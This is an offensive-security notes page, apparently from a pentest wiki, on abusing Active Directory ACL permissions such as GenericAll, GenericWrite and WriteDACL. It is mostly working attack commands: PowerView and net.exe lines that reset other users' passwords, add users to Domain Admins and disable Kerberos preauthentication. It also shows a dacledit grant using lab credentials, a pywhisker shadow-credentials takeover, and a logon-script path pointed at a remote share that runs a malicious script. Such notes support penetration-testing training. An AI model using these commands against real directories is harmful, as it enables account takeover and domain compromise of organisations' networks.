Abusing ACLs/ACEs

Basic Information

Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify these objects (i.e. change account name, reset password, etc).

Example ACEs for the "Domain Admins" object can be seen here from the GUI:

Interesting object permissions and types for attackers:

GenericAll - full rights to the object (add users to groups and password reset)
GenericWrite - update an object's attributes (i.e. logon script)
WriteOwner - change object owner to attacker controlled user to take over the object
WriteDACL - modify object's ACEs and give attacker full control over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group

Exploitation

Granting Write Permissions with dacledit.py

If you have ownership over a group in AD, you can grant write permissions to yourself.

python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'

GenericAll on User

Find domain users that current user has GenericAll rights to

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} ? {$_.ActiveDirectoryRights -like "*GenericAll*"}

Change the password of users with GenericAll rights

net user [user] [password] /domain

Set-ADAccountPassword -Identity [username] -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "[new password]" -Force)

Making a User AS-REPRoastable using GenericAll Privileges

requires PowerView.ps1

Set-ADAccountControl -Identity 'michael' -DoesNotRequirePreAuth $true

Enable/Disable AD account remotely via ldap_shell

GitHub - PShlyundin/ldap_shell: AD ACL abuseGitHub

python3 -m ldap_shell -k -no-pass [domain]/[user] -dc-ip 192.168.1.1 -dc-host [DC01]

Find domain groups that current user has GenericAll access rights to

PV3 > Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} ? {$_.ActiveDirectoryRights -like "*GenericAll*"}

Add user accounts to groups with GenericAll privileges

net group "Example Group" [user] /add /domain

Check for GenericAll rights on object

Using PowerView.ps1, we can check if a user we control has GenericAll rights on an AD object (this this example it will be the michael user:

Get-ObjectAcl -SamAccountName michael -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

Reset user's password without knowing current password using net.exe

net user [username] [password] /domain

GenericAll on Group

Check Group ACL/ACE permission

Get distinguishedName from

Get-NetGroup "domain admins" -FullData

Then using the distinguishedName value, check the permissions

 Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}

The rights will be under the ActiveDirectoryRights attribute.

Adding user to group with GenericAll permissions

net group "domain admins" spotless /add /domain

Add-ADGroupMember -Identity "domain admins" -Members [users]

Add-NetGroupUser -UserName [user] -GroupName "domain admins" -Domain "offense.local"

GenericAll / GenericWrite / Write on Computer

If you have these privileges on a Computer object, you can pull Kerberos Resource-based Constrained Delegation: Computer Object Take Over off.

Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Noteswww.ired.team

GenericWrite on User

Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}

WritePropertyon an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute the malicious script:

Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"

With GenericWrite privileges, we can change the msDS-KeyCredentialLink property to gain full control over an object. If you can wrtie to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of the user.

pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add

Now we generate a Kerberos TGT for management_svc

Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - SpecterOpsSpecterOps

GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.GitHub

GitHub - ShutdownRepo/pywhisker: Python version of the C# tool for "Shadow Credentials" attacksGitHub

https://podalirius.net/en/articles/parsing-the-msds-keycredentiallink-value-for-shadowcredentials-attack/podalirius.net

Exploiting and Detecting Shadow Credentials and msDS-KeyCredentialLink in Active DirectoryMedium

Additional Information Sources

Abusing Active Directory ACLs/ACEs | Red Team Noteswww.ired.team

GenericWrite - SpecterOpsSpecterOps

PreviousPrivilege Escalation with bloodyAD NextActive Directory Persistence

Last updated 10 months ago